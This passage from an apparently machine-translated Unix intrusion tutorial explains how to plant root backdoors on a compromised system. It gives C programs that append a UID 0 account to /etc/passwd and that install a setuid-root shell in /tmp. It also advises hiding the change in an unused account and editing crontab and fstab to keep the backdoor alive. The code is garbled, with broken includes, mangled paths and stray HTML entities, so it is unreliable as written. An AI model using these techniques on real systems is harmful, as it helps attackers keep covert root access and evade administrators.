The simplest method is to add an account with a UID of 0 to the passwd password file. But it is best not to do this, because as long as the system administrator checks the password file, it will be "missed. The following is a C program that adds a UID 0 account to the/etc/passwd password file.
<++> Backdoor/backdoor1.c
# Include
Main ()
{
FILE * fd;
Fd = fopen ("/etc/passwd", "a + ");
Fprintf (fd, "hax0r: 0: 0:/root:/bin/sh \ n ");
}
<-->
A little more concealed than this method is to change the UID of an unused account hidden in the password file to 0 and set its second domain password domain to null. Note: If you are using a higher version of * nix, you may need to modify the/etc/shadow file .)
Place suid shell in the/tmp directory. In the future, as long as you run this program, you will get the root user permission easily. This method is almost the most popular. However, many systems clear data in the/tmp directory every few hours or every startup. Other systems do not allow suid programs in the/tmp directory. Of course, you can modify or clear these limits by yourself because you are already the root user and have the permission to modify the/var/spool/cron/crontabs/root and/etc/fstab files ). The following is the C source program for placing the suid shell program in the/tmp directory.
<++> Backdoor/backdoor2.c
# Include
Main ()
{
System ("cp/bin/sh/tmp/fid ");
System ("chown root. root/tmp/fid ");
System (& quot; chmod 4755/tmp/fid & quot ");
}
<-->